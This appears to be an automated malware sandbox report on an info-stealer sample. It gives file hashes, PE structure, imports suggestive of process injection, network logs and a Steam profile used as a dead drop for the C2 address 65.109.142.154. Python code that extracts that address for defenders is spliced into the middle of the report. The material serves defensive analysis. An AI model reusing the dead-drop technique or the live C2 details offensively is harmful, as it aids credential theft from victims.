                                                                                                                                                                      SHA1:CC0C6F07FC5C03F8C1612FAF477E403FB2B881F4
                                                                                                                                                                      SHA-256:B08C1A3F169290F88B2E4356C9FE33CC0A08A00F4B0D525567EF31A0113E46A1
                                                                                                                                                                      SHA-512:CA28C3654348F0D89C7A3A207B352F204F3DB5F3F3CB29C718F7C00ACC74E231034AB57CB526E7741FEBA284C9129076CEFC84C7B3B2F1694FFD661E758C3522
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:MDMP..a..... ..........g............t...........X!..........$....*......$....]..........`.......8...........T...........X]..V............+...........,..............................................................................eJ.......-......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8352
                                                                                                                                                                      Entropy (8bit):3.6993440266909747
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:R6l7wVeJYc6g6Y9XSUbgmfSaKuprM89bXisfnu9m:R6lXJr6g6YdSUbgmfSaKCXhfV
                                                                                                                                                                      MD5:B689F3E72B33EC7A26A4500B8FF00EA6
                                                                                                                                                                      SHA1:4E2647E86A5E4D42C1D0A2070E81EB1CAA535B03
                                                                                                                                                                      SHA-256:B7F4649A2C0CD04F02157D9039024499D1A3149B89725290D20E4E9DA691EDBE
                                                                                                                                                                      SHA-512:0FF86CA13C259C4D3D8E6391AD517C0D7E03D9382D3F6100B06EC422D37B6B927154ADD40953927FE5EB9C525662529B5B93E2F3836141285F8595753DA24264
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.6.<./.P.i.
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4593
                                                                                                                                                                      Entropy (8bit):4.46657828892958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:uIjfxnI7NR7VEJGLDIIaI05uZ92uq2uld:uItnYNR7aN6OQU7
                                                                                                                                                                      MD5:853DAB20B2AD7015178F4B3B99E0D570
                                                                                                                                                                      SHA1:C371FD89D5B63095F8DCDB69D94FA365D879B34D
                                                                                                                                                                      SHA-256:E68674E04ED9D53475A92035F096E4B1BE80A155AC31858C8C26A6D6F7698CB3
                                                                                                                                                                      SHA-512:341639ADF23F96D3690ACEFC00A4F753D67499DCACE86EA56EC1A1592C6D2C7E3EEB52BB10187A6D6BFB60591DBBB0AB69DEC0C5AF3D122C931FD8E107328788
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="551378" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                      Process:C:\Users\user\Desktop\aZm1EZ2IYr.exe
                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3146), with CRLF, LF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):34619
                                                                                                                                                                      Entropy (8bit):5.4012643309463915
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:J7pqLjWYmmwB5DPgqaciNGAnTBv++nIjBtPF5zfukPco1AULTBv++nIjBtPF5x2P:J78LjWYmmwB5DPgqaccnTBv++nIjBtPJ
                                                                                                                                                                      MD5:E33D40189B3287C741A087AEF273EDDC
                                                                                                                                                                      SHA1:58B51F71B48BC71D732C0ECF1163966789028E60
                                                                                                                                                                      SHA-256:729BAF2F95511FBF29C7FBC4F88970137FDD48115C7F750FAF663CFD86F73FBC
                                                                                                                                                                      SHA-512:324843F9A688A2A9EC003AD7013E4CDFC3721563269B487933A5D92B02B66B9E5DE2A08A5C7AB56E014A04714AD948DDE8F2B7A917D742E692BAF693B70894EA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: g0b4c https://65.109.142.154|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=nBdvNPPzc0qI&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.
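The dropped HTML above is a Steam Community profile page whose title reads "Steam Community :: g0b4c https://65.109.142.154|": the profile's display name carries a URL, which is the dead-drop pattern Vidar-family stealers use to fetch their C2 address from a legitimate site. The Python below is an added example, not code from the report or from the malware: it parses such a page, extracts the handle and every host embedded in the profile name, classifies the host, and ignores pages that merely happen to have a URL in their title. The HTML fragment is constructed to mirror the preview above; it is not the dropped file itself.

```python
"""Pull the C2 address out of a Vidar-style Steam Community dead-drop page.

Added example (stdlib only). The profile display name, echoed by Steam into the
HTML <title>, carries the C2 URL terminated by '|'. SAMPLE_HTML is a constructed
fragment modelled on the report's dropped-file preview, not the file itself.
"""
import ipaddress
import re
from html.parser import HTMLParser

# Constructed fragment mirroring the head of the dropped page (not the real file).
SAMPLE_HTML = """<!DOCTYPE html>
<html class=" responsive" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Steam Community :: g0b4c https://65.109.142.154|</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
</head><body></body></html>
"""

# scheme://host[:port]; the host class excludes '|', so the terminator ends the match.
URL_RE = re.compile(r"(https?)://([A-Za-z0-9.\-]+)(?::(\d{1,5}))?")
STEAM_PREFIX = "Steam Community ::"


class _TitleParser(HTMLParser):
    """Collect the text of the first <title> element."""

    def __init__(self) -> None:
        super().__init__()
        self._in_title = False
        self.title = ""

    def handle_starttag(self, tag, attrs):
        if tag == "title" and not self.title:
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def extract_title(html: str) -> str:
    p = _TitleParser()
    p.feed(html)
    p.close()
    return p.title.strip()


def extract_dead_drop(html: str) -> dict:
    """Return the profile handle and each C2 endpoint found in the profile name.

    Only titles with the Steam Community prefix are considered, so an unrelated
    page with a URL in its title is not reported as a dead drop.
    """
    title = extract_title(html)
    if not title.startswith(STEAM_PREFIX):
        return {"is_dead_drop": False, "handle": None, "c2": []}
    profile_name = title[len(STEAM_PREFIX):].strip()
    matches = list(URL_RE.finditer(profile_name))
    handle = profile_name[: matches[0].start()].strip() if matches else profile_name
    c2 = []
    for m in matches:
        scheme, host, port = m.group(1), m.group(2), m.group(3)
        try:
            ip = ipaddress.ip_address(host)
            kind, is_global = "ip", ip.is_global  # flags bogon/private drops too
        except ValueError:
            kind, is_global = "domain", None
        c2.append({
            "url": f"{scheme}://{host}" + (f":{port}" if port else ""),
            "host": host,
            "port": int(port) if port else (443 if scheme == "https" else 80),
            "kind": kind,
            "is_global": is_global,
        })
    return {"is_dead_drop": bool(c2), "handle": handle, "c2": c2}


if __name__ == "__main__":
    print(extract_dead_drop(SAMPLE_HTML))
```

Run against the dropped file instead of the constructed fragment by reading it with `open(path, encoding="utf-8", errors="replace")`; the resulting host and port are what to pivot on in proxy and DNS logs, and the handle is the indicator that survives when the operator rotates the IP in the profile.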
                                                                                                                                                                      Process:C:\Users\user\Desktop\aZm1EZ2IYr.exe
                                                                                                                                                                      File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1048575
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:/:/
                                                                                                                                                                      MD5:6990D911DF524479494DCF8F4E7ED771
                                                                                                                                                                      SHA1:6ECFC973C8D7AB67FC0D4543944480D0ED225FAE
                                                                                                                                                                      SHA-256:EC5FA004C2DA04D9AA021BD2A82A8E71AF1698E76B8BDED8676D35A588538B67
                                                                                                                                                                      SHA-512:4581C529293C39F80A2CCCBD9D5DE2F82E9B78DDE53CE577A636358DA98BD3E8BD51D07F7AC10D127F33DA77E334CA16C32D811325027EAF52660BC3EF0CB3AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                      Entropy (8bit):4.4654299658794665
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:RIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNBdwBCswSbY:yXD94+WlLZMM6YFHH+Y
                                                                                                                                                                      MD5:009C97A146E71ACA2F287B495932C3A2
                                                                                                                                                                      SHA1:076D3E6326107553E436254E27FAB1D8AB4FFCE5
                                                                                                                                                                      SHA-256:AF1C0A84EA0163E4CF41C3A4A1C315551148261713933EA8C1353F197FF05D75
                                                                                                                                                                      SHA-512:67A8D387E5C584F352DAB01954D4632D1E59B9DB21E07871BB10D27ED841E8EDF55AA543D72E67964D7EB8F5AB378C5AF3B674A9E4E4DA6BBE268CCDED98D590
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...?."..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.4851745888202075
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:aZm1EZ2IYr.exe
                                                                                                                                                                      File size:392'704 bytes
                                                                                                                                                                      MD5:1e1d5412616216fd90ea3cb6a87353db
                                                                                                                                                                      SHA1:da0ae99aebbde6433c8dc985e8c8b2305cdb9b54
                                                                                                                                                                      SHA256:765eb00651ebf6ddbc9c8d6e687292dae89f0d8260cea08505020992835208d8
                                                                                                                                                                      SHA512:fcffb031004aa683656cd2d8ada0703255dd6fd01bf7e2b811e919ee33d4dff9b80ca6f17f44436c2a10d6bafa0abc4fb6c5f3151f167524293302841b00fbe3
                                                                                                                                                                      SSDEEP:6144:MGO+83+N11n5au8LvOWjTMZG6wn+O8qkx0wKYHMCsHW+S0ZaaPG:MGOv3+N11n5ALvpjTACn+dqk0VYExdZa
                                                                                                                                                                      TLSH:51849D1623E130F6F2225534B6494721CBAB78341622F75FABC805656FE6BC1EE2C71B
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?d.]^..]^..]^..2(..E^..2(..R^..2(..b^..T&..X^..T&..M^...'..^^..]^...^..2(..M^..2(..\^..Rich]^..........................PE..L..
                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                      Entrypoint:0x4184f0
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x67043E94 [Mon Oct 7 20:03:32 2024 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                      File Version Major:5
                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                      Import Hash:118187c3a5a9d853faf932e2bfb655fe
                                                                                                                                                                      Instruction
                                                                                                                                                                      je 00007F1FD0E37EC5h
                                                                                                                                                                      jne 00007F1FD0E37EC3h
                                                                                                                                                                      mov eax, FEA66EE8h
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax+000181E8h], edi
                                                                                                                                                                      add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                      add dword ptr [eax-01741D18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01729318h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01729D18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172A718h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0170AB18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172BB18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172C518h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172CF18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0170BB18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172E318h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172ED18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172F718h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01708C18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01730B18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01731518h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01731F18h], edi
                                                                                                                                                                      jmp far eax
                                                                                                                                                                      mov ebp, 74FFFE90h
                                                                                                                                                                      add esi, dword ptr [ebp+01h]
                                                                                                                                                                      mov eax, FE8CD1E8h
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax+00000000h], edi
                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [C++] VS2010 build 30319
                                                                                                                                                                      • [ASM] VS2010 build 30319
                                                                                                                                                                      • [ C ] VS2010 build 30319
                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                      • [LNK] VS2010 build 30319
                                                                                                                                                                       Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_IMPORT          0x3bb80          0xc8          .rdata
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE        0x270000         0xb0          .rsrc
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC       0x271000         0x3338        .reloc
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_IAT             0x30000          0x290         .rdata
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                                                                                                       IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2e304 | 0x2e400 | 6b77308b876d8e37d6342ce65903a9c5 | False | 0.5125052787162162 | Matlab v4 mat-file (little endian) , numeric, rows 4387547, columns 4387560 | 6.459615185396822 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x30000 | 0xc99e | 0xca00 | a8d553db2a2776dfd97934ef96d30060 | False | 0.6050239789603961 | data | 6.366577021451741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3d000 | 0x23206c | 0x20000 | 79770914926047f0864a61e29dda9f6d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x270000 | 0xb0 | 0x200 | 4b7115c48fa1ed45d7fd2da2c2df5abb | False | 0.279296875 | data | 4.097217764488071 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x271000 | 0x49b6 | 0x4a00 | 1c5071c930c30567d2f765a7544a7835 | False | 0.5681482263513513 | data | 5.494938881976661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x270058 | 0x56 | ASCII text, with CRLF line terminators | English | United States | 1.0232558139534884
DLL | Import
msvcrt.dll | strncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, memchr, strcpy_s, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, memmove, __CxxFrameHandler3
KERNEL32.dll | GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, FreeLibrary, GetThreadContext, SetThreadContext, ReadProcessMemory, SetHandleCount, WriteProcessMemory, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, GetLogicalDriveStringsA, CreateThread, CreateFileA, GetFileSize, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, GetCPInfo, HeapSetInformation, GetCommandLineA, HeapReAlloc, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, SetConsoleCtrlHandler, IsProcessorFeaturePresent, GetCurrentThread, InterlockedDecrement, GetACP, GetCurrentThreadId, SetLastError, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, VirtualAllocEx, GetStringTypeW, InterlockedIncrement, TlsFree, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, TlsSetValue, TlsGetValue, TlsAlloc, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, RtlUnwind, HeapCreate
USER32.dll | GetDesktopWindow, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, GetCursorPos, SetThreadDesktop, RegisterClassW, IsWindowVisible, CharToOemA
GDI32.dll | CreateDCA, GetDeviceCaps
ADVAPI32.dll | RegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
SHELL32.dll | SHFileOperationA
ole32.dll | CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear, VariantInit
SHLWAPI.dll |
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-20T08:35:25.223918+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49740 | 65.109.142.154 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 08:35:20.985528946 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:20.985580921 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:20.985835075 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:21.006531954 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:21.006556034 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:22.951739073 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:22.951805115 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.002553940 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.002571106 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.002829075 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.002994061 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.008577108 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.055437088 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.728607893 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.728631020 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.728801966 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.728801966 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.728826046 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.728884935 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.748356104 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.748373985 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.748455048 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.748464108 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.748507023 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.760011911 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.760090113 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.768870115 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.768918991 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.768928051 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.768970966 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.770070076 CEST | 49737 | 443 | 192.168.2.4 | 104.102.49.254
Oct 20, 2024 08:35:23.770078897 CEST | 443 | 49737 | 104.102.49.254 | 192.168.2.4
Oct 20, 2024 08:35:23.790509939 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:23.790555000 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
Oct 20, 2024 08:35:23.790622950 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:23.790888071 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:23.790908098 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
Oct 20, 2024 08:35:25.223642111 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
Oct 20, 2024 08:35:25.223917961 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:25.227292061 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:25.227303028 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
Oct 20, 2024 08:35:25.227534056 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
